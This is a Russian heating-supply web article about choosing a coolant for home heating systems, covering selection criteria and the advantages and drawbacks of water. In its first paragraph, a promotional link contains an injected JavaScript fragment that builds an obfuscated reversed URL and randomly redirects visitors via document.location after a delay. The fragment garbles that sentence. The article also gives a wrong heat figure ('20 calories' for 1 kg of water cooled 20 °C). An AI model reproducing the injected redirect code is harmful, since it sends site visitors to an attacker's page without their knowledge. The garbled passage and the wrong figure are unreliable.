Добавить в закладки

Преимущества теплоносителей

 

Лидером в системе отопления является жидкостная сеть. Производительность этой системы зависит от типа охлаждающей жидкости и ее физических и химических характеристик. Выберать  онлайн и tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topleniya_1/teplonositeli/»>купить теплоноситель для отопления  можно на сайте компании «AVITEK-I».

Теплоноситель — это жидкость, которая распределяет тепло через нагревательное устройство. Материалы, используемые для автоматических централизованных магистралей, могут применяться строго в определенных рамках, поэтому при выборе того, что впрыскивать в систему отопления, нужно знать, каким требованиям должен соответствовать теплоноситель.

Выбирайте охлаждающую жидкость по следующим критериям:

Способен передавать большое количество тепла в единицу времени, сводя к минимуму тепловые потери в основном источнике питания;
Низкая вязкость. От этого зависит скорость движения жидкости и нагрузка на насос;
Степень инертности теплоносителя к металлам и резине. От этого показателя зависит продолжительность использования сети;
Скорость расширения теплоносителя при его нагревании;
Жидкость безвредна для человеческого организма. Этот выбор очень важен. Сюда входят уровни опасности, летучесть, токсичность паров, температуры замерзания и воспламенения, индикаторы возможного самовозгорания и т. д.
Немаловажна и стоимость теплоносителя: он должен быть относительно дешевым или, в случае высокой стоимости, иметь характеристики, позволяющие использовать его длительное время без замены.

В качестве теплоносителя используется вода и незамерзющая жидкость-антифриз. Их используют по-разному. Чтобы определиться, какой вариант лучше, следует более подробно рассмотреть эти материалы, чтобы сделать правильный выбор.

Вода — самый уникальный и дешевый материал. Умягченная вода больше всего подходит для открытых и закрытых систем. Для тепловой сети используют следующие модификации материала:

Обычная вода
Дистиллированная вода;
Вода, содержащая ингибиторы коррозии.
Основное назначение воды заключается в том, что у нее самая высокая теплоемкость из всех жидкостей и не низкая плотность. Например, один килограмм воды с температурой 90 ° C, охлажденный до 70 ° C в радиаторе, выделит 20 калорий тепла.

выгода:

Это экологически чистый материал;
Высокая теплоотдача;
Отличие в хорошей циркуляции;
Этот материал легко доступен;
бюджетный.
Недостатки:

Ниже 0 ° C вода замерзнет. Если вы останетесь зимой в закрытой тепловой сети, могут выйти из строя аккумулятор, расширительный бак и помпа;
Если теплоноситель отводится из трубопровода, попадание воздуха ускорит процесс коррозии;
Перед использованием необходимо изменить химический состав воды. Характеристика естественного состояния воды — жесткость. При высоких температурах карбонат более интенсивно разлагается и откладывается в виде отложений на трубах и стенках генератора. При этом снижается теплоотдача и нагревательный элемент приходит в негодность. Лучше всего добавлять в воду специальные добавки, чтобы продлить срок эксплуатации тепловой сети;
Удельное сопротивление воды необходимо регулировать в течение всего отопительного сезона;
Эту систему необходимо чистить один раз в год.
Конечно, вода отличается от синтетических веществ по токсикологическим и экологическим характеристикам и абсолютно безопасна для человека. В случае протечки это не доставит особых хлопот, а недостатки легко восполнить, залив недостающую жидкость в систему.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: admin
Опубликовано: 03.06.2021





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: